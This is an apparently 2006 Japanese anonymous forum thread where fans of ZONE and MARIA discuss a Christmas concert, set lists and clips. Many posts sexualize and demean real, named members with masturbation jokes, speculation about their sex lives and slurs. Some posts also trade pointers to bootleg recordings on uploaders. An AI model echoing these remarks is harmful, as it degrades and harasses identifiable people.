165 :通行人さん@無名タレント:2006/12/21(木) 20:47:53 ID:8j3+42Pj
白い花っていう曲サイコーーーーー!!!
今度カラオケで歌お


166 :通行人さん@無名タレント:2006/12/21(木) 20:50:17 ID:br4dS29G
>>164凄いじゃん! 
 君友達いないよね。
 大嘘乙

167 :通行人さん@無名タレント:2006/12/21(木) 20:52:38 ID:z9960Ybx
高跳のMARIAの動画も良かったがMIYUの動画により禿しく感動した

168 :通行人さん@無名タレント:2006/12/21(木) 21:44:08 ID:IUVCnj5A
どうでもいいけど、俺の高校MARIAヲタが多すぎるんだが。
実夕ヲタの俺は凄く惨め…

169 :通行人さん@無名タレント:2006/12/21(木) 22:00:34 ID:ba9KLCh5
高跳のMIYUの動画の胸の谷間(;´Д`)ハアハアハアハアハアハア

170 :通行人さん@無名タレント:2006/12/21(木) 22:32:19 ID:8J45OFj/
俺もその動画見てみたいな。
うP頼む

171 :通行人さん@無名タレント:2006/12/21(木) 22:47:08 ID:8zSVt/D/
>>166自分とあまりにも違う世界だから悔しいんだろ。友達はいっぱいいるよ。100人位。悔しかったら同じことやってみろ(笑)
まあ無理だけどねwwww

172 :通行人さん@無名タレント:2006/12/21(木) 22:53:52 ID:ba9KLCh5
>>170会員じゃなくても見れる。
来年からMIYUはちょいエロ路線でいくのか(;´Д`)ハアハアハアハア

173 :通行人さん@無名タレント:2006/12/21(木) 22:59:20 ID:D84zQV/V
Miyuに胸の谷間って
あるのか?

174 :通行人さん@無名タレント:2006/12/21(木) 23:01:15 ID:ACZ83wyq
>>154
あなたはもしやカラオケ板ZONEスレの方?

175 :通行人さん@無名タレント:2006/12/21(木) 23:04:24 ID:8J45OFj/
>>172どこのサイトで見れるの?詳細頼む

176 :通行人さん@無名タレント:2006/12/21(木) 23:09:00 ID:ba9KLCh5
>>175食い付きすぎだろw
>>1のサイトだよ。

177 :通行人さん@無名タレント:2006/12/21(木) 23:16:50 ID:mHCjcTWg
>>174
あんな過疎スレの住人がいたなんて…
>>158
バイトしてる高校生ならそれぐらいは持ってるかと。俺の場合は金を使う機会がないし…

178 :ロワ(^o^)/バトル:2006/12/21(木) 23:20:27 ID:u+OTzs8J
僕らは古びたランタイムという建物にいた。僕「喉乾いたな」みゆ「はい」残り僅かな水をみゆは躊躇いもなく僕に渡した。僕「ありがと」ゴクッ 間接キス… チャラリーン♪武「死んだ人の名前を発表しまーす♪男子12番>>176君♪7番>>175君が死にました♪」僕「相澤に高田…」

179 :通行人さん@無名タレント:2006/12/22(金) 00:18:28 ID:dK48Ivy6
Miyuの谷間で抜いた

180 :通行人さん@無名タレント:2006/12/22(金) 00:45:53 ID:cG8zygEW
>>168
いるだけ幸せだよ。俺の学校なんて全くと言っていいほど知名度が…。
漏れはクラスの人にZONEファンだってことも言えないでいるよ。

181 :通行人さん@無名タレント:2006/12/22(金) 01:52:29 ID:RbWNJvEH
>>179
俺も抜くかな

182 :通行人さん@無名タレント:2006/12/22(金) 02:06:22 ID:hDrLiDUy
みゆたん黒くねえ?ギャルじゃんw

183 :通行人さん@無名タレント:2006/12/22(金) 02:08:22 ID:wKYAn18Z
何かショックだなw

184 :通行人さん@無名タレント:2006/12/22(金) 08:20:40 ID:6Jt/PdSA
実夕も谷間を強調するようになったか
まぁ彼氏とヤリまくって胸も大きくなったんだな

185 :通行人さん@無名タレント:2006/12/22(金) 08:55:48 ID:yLhbi4E7
>>184
誰かが絶対書くと思ったw

186 :通行人さん@無名タレント:2006/12/22(金) 09:05:33 ID:iW4ghdM6
実夕はギターも歌も上手いのにもったいないよな。ZONEで研いた実力が・・・
それで今は今時のヤリマンギャルか

187 :通行人さん@無名タレント:2006/12/22(金) 10:47:59 ID:K7Yz4ynr
谷間ができるくらい大きくなったんだなぁ

188 :通行人さん@無名タレント:2006/12/22(金) 11:52:11 ID:iW4ghdM6
太ったも有り得る

189 :通行人さん@無名タレント:2006/12/22(金) 13:35:18 ID:gACkKzvI
なあ、皆クリスタルの座席ってどのへんなの?

190 :通行人さん@無名タレント:2006/12/22(金) 14:27:19 ID:dh/EsBpv
有名オタはみんな前のほうにかたまってるよ

191 :通行人さん@無名タレント:2006/12/22(金) 20:16:39 ID:XjEd9bdH
Mステ見てたら三年前の事を思い出してしまった。

192 :通行人さん@無名タレント:2006/12/22(金) 21:06:21 ID:W/gD09vS
>>191
ZONE出たの?


193 :通行人さん@無名タレント:2006/12/22(金) 22:24:35 ID:iW4ghdM6
確かたかよのラストMステのスーパーライブぢゃなかったけ?

194 :通行人さん@無名タレント:2006/12/22(金) 23:17:16 ID:kCDIgyR8
シクベ歌ってたな

195 :通行人さん@無名タレント:2006/12/22(金) 23:19:32 ID:iW4ghdM6
シクベだったけ?
ツルブルだった気が・・・

196 :通行人さん@無名タレント:2006/12/22(金) 23:23:25 ID:kCDIgyR8
シクベは紅白だった
スマソ

197 :通行人さん@無名タレント:2006/12/22(金) 23:25:02 ID:16HEIZSy
>>195俺もそう思う。シクベは武道館の中継の時だろ。

198 :通行人さん@無名タレント:2006/12/22(金) 23:28:35 ID:dh/EsBpv
たしか最後のつるぶるだったきが

199 :通行人さん@無名タレント:2006/12/22(金) 23:39:14 ID:UD7/EapW
最後は紅白のシクベだってば。

200 :通行人さん@無名タレント:2006/12/22(金) 23:43:47 ID:gACkKzvI
数ヵ月ぶりの生まいちん楽しみだな。
実夕の胸の谷間も楽しみだな。

201 :通行人さん@無名タレント:2006/12/22(金) 23:54:17 ID:iW4ghdM6
今君が立ってる場所は私長瀬実夕の小さいお胸の1番見えるベストポジション〜

202 :通行人さん@無名タレント:2006/12/23(土) 00:28:36 ID:yIU+kOdK
                 / /_________________________
                 / / __     __        n     _____    /
                 / / |   |     /  /      / /    /       |   /
                / /  |   |    /  /      / /   . /        .|   /
               / /  |   |.   /  /    /⌒ヽ/     /   / ̄ ̄|  l  /
         .      / / . |   |  /  /    ( ^ω^ )     /   /.  / /  /
  .          . / ./   |   |  /  /     ノ/ /  ノ   /    ̄ ̄ /  . /
             / /  . |   |. /  /   // / ノ     /   / ̄ ̄ ̄ .   /
             / /    |   |/  /  ⊂( し'./    /   /         /
            / /     |     /     | ノ'     . /   /         /
            / /     |    /.     し'      ./   /        /
           / /      ̄ ̄ ̄              ̄ ̄         ./
           / /_______________________/
   /⌒ヽ    (  ̄)
  ( ^ω^) / /
/⌒  _ / /./
 \    //_/\
    ̄ ̄ ̄(_二_)

この糞スレはVIPが占領しますた


203 :通行人さん@無名タレント:2006/12/23(土) 07:38:05 ID:G9eJQfcE
携帯からはみゆちゃんのオパーイ見れんの???!!!??ハァハァうぷうぷ!抜きたい!ハァハァ

204 :通行人さん@無名タレント:2006/12/23(土) 12:47:15 ID:3GB0NB+x
あげ

205 :通行人さん@無名タレント:2006/12/23(土) 15:08:12 ID:51tcCsBS
30代らしきキモヲタ軍団キメェよ!

206 :通行人さん@無名タレント:2006/12/23(土) 15:15:46 ID:51tcCsBS
後、MARIAの写真集ボッタクリだな。
ツアーの舞台裏とかいうから買ったのになんだあれは!
3000円は高すぎる!

207 :通行人さん@無名タレント:2006/12/23(土) 16:37:38 ID:1QIWzvIT
12列目21 22番・・・・・
ぬはぁおおお行きたかった。miyuにあいたかた:::

208 :通行人さん@無名タレント:2006/12/23(土) 18:06:24 ID:OARW5C6V
いまかでもいってこい!

209 :通行人さん@無名タレント:2006/12/23(土) 19:06:33 ID:FnIseTLH
今、出会い系サイトのMコミュで自称舞子が
ベース募集って投稿してるんだが本物かな?

昨日あたりから投稿してるんだよね。今、画像も更新して
サンタさんのコスプレのっけてたよ。

北海道(道央)20歳 画像ありで進んでごらん。18:35更新だ



210 :通行人さん@無名タレント:2006/12/23(土) 19:50:06 ID:1QIWzvIT
すまん住んjとこ千葉

211 :通行人さん@無名タレント:2006/12/23(土) 21:55:54 ID:51tcCsBS
クリスタル終わったよ。
MARIAセットリスト悪すぎ…ハートビート(ドキドキ)ハイフラ・JUMP・あなた越しのイルミネーション・つぼみ・小さな詩


212 :通行人さん@無名タレント:2006/12/23(土) 21:58:11 ID:6xPcUCHJ
みゆは?

213 :通行人さん@無名タレント:2006/12/23(土) 22:44:42 ID:WXm0bw8Q
かわいい

214 :通行人さん@無名タレント:2006/12/23(土) 22:47:19 ID:AxcMhA/o
>>212
Miyuスレに書いてあるよ

215 :通行人さん@無名タレント:2006/12/23(土) 23:15:29 ID:51tcCsBS
サンタまいちんとみゆ可愛かったよ。
あと、まいちんがFCイベでダンスを踊ってたよ。
俺はダンスよりもまいちんの胸に釘付けだったがw
まいちん意外にMARIAで一番でかいなFCイベの衣装は胸の形がハッキリ出て…

216 :通行人さん@無名タレント:2006/12/23(土) 23:28:28 ID:s+ytm7nd
>>215
胸でかいか?
俺は最後のサンタの恰好でまいちんのスカートがヒラヒラしてるのにハラハラしてたw

217 :通行人さん@無名タレント:2006/12/23(土) 23:39:41 ID:51tcCsBS
ハラ×2というかめっちゃ見てしまったなw
てか、>>211のセットリストXMARIAとはっちゃけ笑顔が抜けてた。

218 :通行人さん@無名タレント:2006/12/23(土) 23:43:14 ID:s+ytm7nd
>>217
あゆかとか中にはいてたけどまいちんはいてたかな?スカートを手でおさえてたところがなんか好きw

219 :通行人さん@無名タレント:2006/12/23(土) 23:51:03 ID:Rf7E3mJd
まいちんはきっと中にはき忘れてたんだハァハァ

220 :通行人:2006/12/23(土) 23:52:42 ID:r0/DTpcO
こんばんは〜、クリスタルライヴの模様を詳しく教えてください〜〜


221 :通行人さん@無名タレント:2006/12/23(土) 23:55:45 ID:51tcCsBS
そこまでは見てないが太ももがチラチラ見えたからwあゆかと同じのは履いてないな。
てか、まいちん髪の毛を切ったんだな。夏のツアーのイメージだったからな…今日の髪型は似合ってたな。
やっぱり肩ぐらいの長さが可愛いな。

222 :通行人さん@無名タレント:2006/12/24(日) 00:01:53 ID:s+ytm7nd
>>221
そうそう太モモがチラチラ見えてちょっと興奮してたw あゆかとかは太モモ見える前に中にはいてるのが見えてたもんな。
はいてなかったのかなぁ…
まいちんはショートの方がいいね。けどZONEのまいちんの方が可愛かったな

223 :通行人さん@無名タレント:2006/12/24(日) 00:08:33 ID:DFs9FsCW
何だか完璧アイドルだな

224 :通行人さん@無名タレント:2006/12/24(日) 00:14:17 ID:2au0J5Q1
アイドルだな。
更にまいちんのことが好きになっちゃったハァハァ

もうこの気持ちを我慢するのが大変だよまいちん

225 :通行人さん@無名タレント:2006/12/24(日) 00:23:00 ID:RAqm9UZl
今日のセットリストはヲタ向けな感じだったな。
所でMARIAの後に出た子だれ?
MARIAの後でランタイム生だからなw客席が恐ろしく白けてたw

226 :通行人さん@無名タレント:2006/12/24(日) 00:40:52 ID:HsJhB71Q
なんかあんたらキモイ

227 :通行人さん@無名タレント:2006/12/24(日) 01:14:41 ID:+F1qfCwK
あのさ、みてておもったんだけど
あのギターの人かわいいな
TOMOKAだっけ
MAIKOっていう子も天然ぽくてよろしい
MIYUっていうヴォーカルの子は普通にかわいい
で、ドラムの子・・・
「えっ」って思った

以上ファイナルライブの映像みた感想
http://www.youtube.com/watch?v=ou8XnpiMGaU
TOMOKA>MAIKO>MIYU>>MIZUHO
です

228 :通行人さん@無名タレント:2006/12/24(日) 01:30:24 ID:HsJhB71Q
だろトモカ1番だろ

229 :通行人さん@無名タレント:2006/12/24(日) 01:37:29 ID:+F1qfCwK
>>228
はい
「証」をyoutubeで検索してて気づいた
TOMOKAのパートがない
途中から加入したんですね
知らなかった
現在は音楽活動はしていないとか(wikipediaより)
いいお婿さんもらっていい家庭を気づいていたらいいなぁ〜


230 :通行人さん@無名タレント:2006/12/24(日) 01:53:04 ID:HsJhB71Q
証はトモカパートあるら?
ないのはバラード系だよ

231 :通行人さん@無名タレント:2006/12/24(日) 01:59:42 ID:DFs9FsCW
>>230
どこ住み?

232 :通行人さん@無名タレント:2006/12/24(日) 02:09:55 ID:HsJhB71Q
愛知

233 :通行人さん@無名タレント:2006/12/24(日) 02:16:26 ID:33n0lprR
>>225
あの子恐ろしく歌が上手かったな。
ランタイムにあんな実力者がいたなんて。

234 :通行人さん@無名タレント:2006/12/24(日) 02:16:44 ID:HSjV8hWU
TOMOKAかわイイ

235 :通行人さん@無名タレント:2006/12/24(日) 02:19:44 ID:HsJhB71Q
トモカはかわかっこいい。
でも二の腕太いのが欠点

236 :通行人さん@無名タレント:2006/12/24(日) 07:40:36 ID:Yc8mmYTI
今日明日はみんな間違いなく彼氏とセックスするんだろうな

237 :通行人さん@無名タレント:2006/12/24(日) 07:43:35 ID:f1fodQol
>>230の正体はベンジー

238 :通行人さん@無名タレント:2006/12/24(日) 08:57:23 ID:RAqm9UZl
そういやポン酢のヴォーカルがすごい事を言ってたなw
ポン酢の奴が客席を見回して「どうやらこの中にXmasを彼氏彼女と過ごす人は居ない様ですね」
まあ、当たりだと思うがw
前の方にいた40代らしきヲタは嫁もいないんだろうな。

239 :通行人さん@無名タレント:2006/12/24(日) 09:02:56 ID:5do8tYq1
こんな糞ライブ、もてない男のリトマス試験紙みたいなもんだからな

240 :通行人さん@無名タレント:2006/12/24(日) 09:24:23 ID:Yc8mmYTI
ルンチメ生とかは性夜があるがヲタは虚しく帰るだけだもんな

241 :通行人さん@無名タレント:2006/12/24(日) 11:32:43 ID:3/r6+WDB
Takayoライブ1時間30分前…集まってるのは15人ってとこかな
あと15席ぐらいだから来るのならばお早めにどうぞ

242 :通行人さん@無名タレント:2006/12/24(日) 11:50:18 ID:cAdcZNq9
>>241
レポよろしく頼みます
バイトを恨みます

243 :通行人さん@無名タレント:2006/12/24(日) 11:56:59 ID:Os4HmPuU
>>229
武道館のならTOMOKA歌ってる
TOMOKAの証も良いよ

244 :通行人さん@無名タレント:2006/12/24(日) 12:27:31 ID:2au0J5Q1
>>225>>233
去年もそうだったけど、明らかにメインで出てるMARIAとかより上手いんだが

本来なら立場が逆だよな

その人からすると私の目標はこんなキモヲタの前でヲタを喜ばせることじゃないんだよ!!って感じなのか?

245 :通行人さん@無名タレント:2006/12/24(日) 12:29:48 ID:2au0J5Q1
>>236
リアルだなw
やっぱりまいちんもそうなのかな(´・ω・`)
そうなら凹むな…
あぁ…まいちん(´・ω・`)

246 :通行人さん@無名タレント:2006/12/24(日) 14:26:02 ID:7ZtKUgdd
>>203おまえラキアだろ?


247 :通行人さん@無名タレント:2006/12/24(日) 15:44:20 ID:RAqm9UZl
ポン酢のJINがウラヤマシス最後の挨拶で右にまいちん左にみゆで手を繋いで挨拶してた。
それにしてもルンチメはもう握手会はしないんだな……またハイタッチだったな。
もうキモヲタと握手するのは限界と言うことか。

248 :通行人さん@無名タレント:2006/12/24(日) 15:57:53 ID:2au0J5Q1
>>247
かもな。まいちんも我慢の限界なのかな(´・ω・`)
昨日のMARIAの写真撮影当たった人、まいちんの方見て何か話し掛けてるように見えたけど、まいちんは目をそらしてシカトしてるようだった。

あれがまいちんのヲタに対しての本心なのかな

249 :通行人さん@無名タレント:2006/12/24(日) 16:12:01 ID:DFs9FsCW
>>248
んな事考えていたって
スタイルがヲタ受けしやすいからしょうがない

250 :通行人さん@無名タレント:2006/12/24(日) 16:16:39 ID:KHI6dmrt
MIYUはひとりぼっちの月の時、ダンスしてた?もぉMIYUのダンスしてる姿は見たくない。やっぱMIYUはギターだな。解散してからはもぉギターには触れないと思っていたけどよかった

251 :通行人さん@無名タレント:2006/12/24(日) 18:06:41 ID:177/aKVd
さっきカラオケに行ってたんだが、
隣の部屋から「旅立ち・・・」が聞こえてきた。
彼女の歌よりそっちを聞いてたら、
最後の歌詞「君に支えられたから〜」だって。

「む!知ってるな!」と思ってしまったよwww

252 :通行人さん@無名タレント:2006/12/24(日) 18:39:32 ID:s2i2NABU
>>251
それなんてエロゲ?

253 :通行人さん@無名タレント:2006/12/24(日) 19:16:10 ID:XZ7Lojeb
ともかちゃんかわいい

254 :通行人さん@無名タレント:2006/12/24(日) 19:19:01 ID:1eebKX7p
実夕の衣装ヤバ杉かなりズレてたよな
本人も気になるのかやたら引張たり胸押さえたりしてたよな?

255 :通行人さん@無名タレント:2006/12/24(日) 19:19:58 ID:RAqm9UZl
>>248まあ、まいちんは元々人見知りする子だからな。
昔は知らない人と話すだけで赤面するって言ってたしな。

256 :通行人さん@無名タレント:2006/12/24(日) 20:28:22 ID:HsJhB71Q
>>251 歌ってたのは女?
君に支えられたから は誰verだっけ?

257 :通行人さん@無名タレント:2006/12/24(日) 20:35:29 ID:1eebKX7p
朝香だろw

258 :通行人さん@無名タレント:2006/12/24(日) 20:41:58 ID:msVmQG5k
旅立ちは朝香のやつしか聴いてねぇや…
他シラネ

259 :通行人さん@無名タレント:2006/12/24(日) 20:46:07 ID:DFs9FsCW
俺はみずほのが好き

260 :通行人さん@無名タレント:2006/12/24(日) 20:48:42 ID:2au0J5Q1
>>254
FCイベの方か?
前のやつ羨ましかった

礼したときとか見えなかった?

261 :通行人さん@無名タレント:2006/12/24(日) 21:18:21 ID:jAO7Ay3m
川*´ー`ハ 飛び立つよ大空へと
ノリ‘▽‘从 君に支えられたから
从@^w^从 僕は今歩き出すよ
ノソ0’v’) いつかまた君のそばに

262 :通行人さん@無名タレント:2006/12/24(日) 21:36:25 ID:RAqm9UZl
まいちんの高跳のBLOGの最後が意味深だな

よいクリスマスイブを…………

なぜ最後が………なんだw
お前らみたいなキモヲタじゃ、どうせXmasなんか関係ないだろって暗に言ってるのか?

263 :通行人さん@無名タレント:2006/12/24(日) 22:12:00 ID:2au0J5Q1
>>262
…が3つも付いてるw
キモヲタにそう思ってるのかもしれないけど、クリスマスだけど私は独りぼっちです…って意味かも知れないぞ

今までアイドルとして好きだったけど、昨日のクリスタルで一般の女を好きになる気持ちで好きになってきちゃった(´・ω・`)

264 :通行人さん@無名タレント:2006/12/24(日) 22:17:39 ID:HsJhB71Q
ここのヲタキモスギ

265 :通行人さん@無名タレント:2006/12/24(日) 22:57:22 ID:2au0J5Q1
>>255
昨日は人見知りじゃなくて相手がヲタだからだね

266 :通行人さん@無名タレント:2006/12/24(日) 23:32:22 ID:HsJhB71Q
こればかりはアイドル宿命だね

267 :通行人さん@無名タレント:2006/12/24(日) 23:46:52 ID:528/ELmj
なんで俺には彼女がいないんだぁ!!!!
なんで俺は今一人ぼっちなんだぁ!!!!!!!

268 :通行人さん@無名タレント:2006/12/24(日) 23:54:34 ID:RL/4cp/J
Miyuの音源聴いた。
めちゃくちゃ歌が上手くなってるのにビクーリしたよ^^;
正直鳥肌が立ちますたw

269 :通行人さん@無名タレント:2006/12/24(日) 23:57:56 ID:1eebKX7p
それはどこにあるの?

270 :通行人さん@無名タレント:2006/12/24(日) 23:59:07 ID:528/ELmj
http://www.youtube.com/watch?v=UXhEhIs5yew&NR
TOMOKAかわいいーー

271 :通行人さん@無名タレント:2006/12/25(月) 00:03:52 ID:DFs9FsCW
>>269
クレクレニあるよ

272 :通行人さん@無名タレント:2006/12/25(月) 00:06:30 ID:1eebKX7p
クレクレ落ちてるよね?

273 :通行人さん@無名タレント:2006/12/25(月) 00:08:03 ID:DFs9FsCW
ごめん
マリアのうpスレ

274 :通行人さん@無名タレント:2006/12/25(月) 00:11:56 ID:+Xc+sfJY
嘘を付くなよ。
聴いたけど、Xmasを彼氏彼女と過ごす様な人は居ない様ですねって奴だったぞ!
ポン酢のくせに生意気な。

275 :通行人さん@無名タレント:2006/12/25(月) 00:14:12 ID:mDzNSCih
>>274
ウソじゃないよ
もう一個入ってるじゃん

276 :通行人さん@無名タレント:2006/12/25(月) 00:15:43 ID:ktz8elTM
あったサンクス

277 :通行人さん@無名タレント:2006/12/25(月) 00:36:21 ID:+Xc+sfJY
あったな。。。。
何故サンプルにポン酢のあれを選んだんだ…

278 :通行人さん@無名タレント:2006/12/25(月) 00:40:12 ID:ktz8elTM
俺のまわりでも5人ぐらいは録音してた
それが案外有名オタで各地のイベに参加してる香具師ら

279 :通行人さん@無名タレント:2006/12/25(月) 00:42:16 ID:gLJBSZLR
みんなどちらのアプロダでゲットしてる?

280 :通行人さん@無名タレント:2006/12/25(月) 01:22:16 ID:+Xc+sfJY
斧で

281 :通行人さん@無名タレント:2006/12/25(月) 01:24:42 ID:fatx4k7G
>>261
それぞれいい歌詞だね。
「旅立ち…」って俺的には何度か聞いているうちにいいって思うようになった曲だったよ。
たとえて言うなら何度も噛むことで味が出てくるするめのようなものかな。

282 :通行人さん@無名タレント:2006/12/25(月) 01:30:24 ID:gLJBSZLR
>>280 詳細頼む

283 :通行人さん@無名タレント:2006/12/25(月) 01:34:07 ID:24Si7Gh+
ともかちゃんかわいい

284 :通行人さん@無名タレント:2006/12/25(月) 01:36:48 ID:nZmSWbfH
斧と言ってわからないとは

285 :通行人さん@無名タレント:2006/12/25(月) 01:49:34 ID:IfdmDUEm
MIZUHOを見直した
http://www.youtube.com/watch?v=v-RHK_wtyQQ&mode=related&search=

286 :通行人さん@無名タレント:2006/12/25(月) 01:55:26 ID:CKyDLkgg
仲居と石橋に殺意が湧いた

287 :通行人さん@無名タレント:2006/12/25(月) 02:21:10 ID:gLJBSZLR
>>284俺マヂ分からん。
アド載せてください

288 :通行人さん@無名タレント:2006/12/25(月) 02:35:49 ID:DhL7L74R
スレ違いなのでやめてください

289 :通行人さん@無名タレント:2006/12/25(月) 07:10:49 ID:Or5u/ofp
くれくれでうpロダ名書かれてなくて
場所がわからないからここで聞き込み

厨房必死だな

んで、みゆとか今ごろセックスして寝てるんだろうな

290 :通行人さん@無名タレント:2006/12/25(月) 09:09:29 ID:ywW7E4lf
漏れはロダわかってても斧の意味が…orz

291 :通行人さん@無名タレント:2006/12/25(月) 10:35:08 ID:mDzNSCih
>>289
そりゃ聴きたいだろうよ

292 :通行人さん@無名タレント:2006/12/25(月) 12:49:57 ID:Or5u/ofp
nana12345.zipとかN8 6789で場所わからんのなら諦めるしかない

293 :通行人さん@無名タレント:2006/12/25(月) 13:33:28 ID:+Xc+sfJY
だから、かりすくだよ(何故か携帯で英に変換ができない……)
パスはMARIAのうpスレにあるでしょ。

294 :通行人さん@無名タレント:2006/12/25(月) 13:36:16 ID:ktz8elTM
アックス 斧 Nナンバーは容量ごとにロダが分かれてるだろ
http://www.axfc.net/

この話はEND

295 :通行人さん@無名タレント:2006/12/25(月) 13:48:02 ID:s/Rpu6n+
ありがとう パスは1215だよね??

296 :通行人さん@無名タレント:2006/12/25(月) 15:04:53 ID:rMMKumWM
Miyuにギターを持たせたのはフェンダーとのつながりを保つため

297 :通行人さん@無名タレント:2006/12/25(月) 15:18:26 ID:KfkQVPOA
>>295
スレ違いだから。いいかげんどっか行ってくれ。
>>296
Miyuの使ってたギターはやっぱりFenderだったのかな?遠くて見えなかったけど。
ソロでやるならバックにFenderがいないときついかもね。

298 :通行人さん@無名タレント:2006/12/25(月) 16:03:51 ID:s/Rpu6n+
クリスタルliveの時シクベ歌ったみたいだけど、バックバンドはMARIAだったの??

299 :通行人さん@無名タレント:2006/12/25(月) 16:59:36 ID:ktz8elTM
BON'Zだったよ

300 :通行人さん@無名タレント:2006/12/25(月) 17:41:31 ID:rMMKumWM
>>297
MiyuのギターはGuildとフェンダーブログに載ってる

301 :通行人さん@無名タレント:2006/12/25(月) 21:23:50 ID:+Xc+sfJY
また、実夕の音源がうpされてる。
あのザクの歌が実夕の気持ちなのかな。
良い選曲だよ。

302 :通行人さん@無名タレント:2006/12/25(月) 22:05:18 ID:gLJBSZLR
シクベのキレイな音源ってうっpされてる?

303 :通行人さん@無名タレント:2006/12/25(月) 22:35:04 ID:ktz8elTM
あたまだけだった

304 :通行人さん@無名タレント:2006/12/25(月) 22:55:15 ID:gLJBSZLR
ベースの音でかすぎぢゃね?
あれが1番音割してる

305 :通行人さん@無名タレント:2006/12/26(火) 00:33:58 ID:QP+HUfGE
MIZUHOちゃんかわいい

306 :通行人さん@無名タレント:2006/12/26(火) 01:17:52 ID:QP+HUfGE
>>301
どこにうpされてるの?ヒント頼む。

307 :通行人さん@無名タレント:2006/12/26(火) 01:50:11 ID:aXX7ixt8
マリアすれ

308 :通行人さん@無名タレント:2006/12/26(火) 12:40:49 ID:Qo4uYt27
ともかちゃんかわいい

309 :通行人さん@無名タレント:2006/12/26(火) 13:38:22 ID:wsiYUxy/
ともかはもういません><

310 :通行人さん@無名タレント:2006/12/26(火) 14:35:15 ID:aXX7ixt8
ともかは死にました

311 :通行人さん@無名タレント:2006/12/26(火) 18:05:45 ID:CrkX0hlg
勝手に殺すなよ

312 :通行人さん@無名タレント:2006/12/26(火) 18:57:49 ID:wsiYUxy/
草場の影からまいちんと実夕を見守ってね、ともかちゃん。

313 :通行人さん@無名タレント:2006/12/26(火) 19:12:26 ID:SrhmnNKu
もう・・・・ミズホちゃんのイジメには耐えれません・・
ごめんねミユちゃんマイコちゃん・・・・・

314 :通行人さん@無名タレント:2006/12/26(火) 19:50:45 ID:2ue+1T5+
フェンダーブログより
---------------
ZONEの曲を歌い継いでいくのはMiyuしかいないんだよ。
帰るべき場所は、君自身の中にあるんだよ。
だって、MiyuこそがZONEそのものなんだから。
---------------
他メンバー全否定されましたw

315 :通行人さん@無名タレント:2006/12/26(火) 20:25:26 ID:PBAPyQB1
>>134そりゃあ、今復帰しているのは舞衣子とMiyuしかいないんだし。
今日FCに入会しました。Miyuが復帰してくれたし、何よりギターを弾いてくれることが嬉しかったから。

316 :通行人さん@無名タレント:2006/12/26(火) 20:27:17 ID:PBAPyQB1
↑ごめん>>314だったw


317 :通行人さん@無名タレント:2006/12/26(火) 20:54:24 ID:BeexU61h
ふぇんだーますたーって日本法人の社長?

318 :通行人さん@無名タレント:2006/12/26(火) 20:56:43 ID:QYJr6r5H
>>314
当然だろ。MIYUこそZONEだ。

TAKAYO … 途中で辞めた。
MAIKO  … 途中でやめようとしたことがある。
MIZUHO … 辞めようとして解散に追い込んだ。
TOMOKA … 途中から入った。

319 :通行人さん@無名タレント:2006/12/26(火) 21:14:31 ID:eCQRPlY/
しんよん うぜぇ

320 :通行人さん@無名タレント:2006/12/26(火) 23:53:55 ID:/xte0/XH
ちんよんwww

321 :通行人さん@無名タレント:2006/12/26(火) 23:55:28 ID:0LiJtUzK
>>318
TOMOKA … 途中抜けてた

じゃなくて?

322 :通行人さん@無名タレント:2006/12/27(水) 00:05:04 ID:KdUDx5W+
ラブカツでシクベだべ!

323 :通行人さん@無名タレント:2006/12/27(水) 00:05:15 ID:EzYBXEAT
日テレでシクベが!!

324 :通行人さん@無名タレント:2006/12/27(水) 00:07:03 ID:o7J0u5ZD
きてるな

325 :通行人さん@無名タレント:2006/12/27(水) 00:14:32 ID:pOq/0Uo/
>>318
MAIKOについてkwsk

326 :通行人さん@無名タレント:2006/12/27(水) 01:10:16 ID:jvSqNSrP
MAIKOって万人受けする顔つきのような気がする。
MIZUHOはEに入っている「一雫」の時の写真を見たらなんかやせた友近のように見えた。(苦笑)

327 :通行人さん@無名タレント:2006/12/27(水) 02:02:27 ID:KdUDx5W+
トモカは完璧

328 :通行人さん@無名タレント:2006/12/27(水) 02:50:32 ID:chcZJ2Ns
>>326
>MAIKOって万人受けする顔つきのような気がする。
アイドルらしいアイドル顔だ。

329 :通行人さん@無名タレント:2006/12/27(水) 03:23:18 ID:KdUDx5W+
いやトモカの方がアイドル顔

330 :通行人さん@無名タレント:2006/12/27(水) 10:28:05 ID:MHjKoywH
ともかはもういません><

331 :通行人さん@無名タレント:2006/12/27(水) 13:39:30 ID:xL6jKrm+
MAIKOが万人受け?
それはありえない

332 :通行人さん@無名タレント:2006/12/27(水) 14:10:43 ID:E2hZHEjp
http://www3.axfc.net/uploader/12/so/N12_13689.zip.html
これ中身何か分かる人いる??
miyuって書いてあるんだが・・
分かるならパス教えてくらさい

333 :通行人さん@無名タレント:2006/12/27(水) 15:08:34 ID:3gWSQN2a
ZONEってMAIKOとバックダンサーのユニットだと思ってた

制汗剤のTVCFとかみると、MAIKOが中心だから…

334 :通行人さん@無名タレント:2006/12/27(水) 15:16:36 ID:QAOf+kOY
最初はTAKAYOとTOMOKAがメインボーカルで
他はバックダンサーだったんだよ

335 :通行人さん@無名タレント:2006/12/27(水) 15:23:46 ID:3gWSQN2a
ルックスはMAIKOが断トツなのに
逆立ちした企画ユニットだったんだね

インディーズ時代のZONE映像なんかを
見ると、MAIKOはまんま宮崎駿アニメの
ヒロインじゃん

336 :通行人さん@無名タレント:2006/12/27(水) 15:27:21 ID:MHjKoywH
>>333人気があるのが優遇されるんだよ。
コンビニのCMでもMAIKOが目立ってた。

337 :通行人さん@無名タレント:2006/12/27(水) 15:42:22 ID:0bVrBvV/
推しの子が一番可愛く見えるだけ
妄想に近いな

338 :通行人さん@無名タレント:2006/12/27(水) 17:31:52 ID:QAOf+kOY
MAIKOが本当に万人受けするならMARIAはもっと売れてるはず
結局ヲタクっぽいのにしか人気ない

339 :通行人さん@無名タレント:2006/12/27(水) 17:43:56 ID:b1Ph2Yzq
MAIKOが可愛い?www

340 :通行人さん@無名タレント:2006/12/27(水) 18:08:50 ID:MHjKoywH
>>338顔が良ければ売れるのか?
クリスタルの舞衣子は普通に可愛かったよ

341 :通行人さん@無名タレント:2006/12/27(水) 18:27:03 ID:OWhTl25K
歌手を顔で判断するのは可哀想

まぁ末期のZONEはほぼアイドルになってらからしょうがないが…

342 :通行人さん@無名タレント:2006/12/27(水) 18:30:51 ID:QAOf+kOY
とりあえず万人受けするってことはないだろう。

343 :通行人さん@無名タレント:2006/12/27(水) 18:43:47 ID:xL6jKrm+
まいこ静止画だけ可愛い。
歌ったりしゃべったりすると他のが良く見える。
雰囲気とキャラがダメなのかな。

344 :通行人さん@無名タレント:2006/12/27(水) 20:03:40 ID:MHjKoywH
MIZUHO.一般的に見てけっして可愛いくはない
MIYU.顔のデカさがネックやはり万人向けじゃない
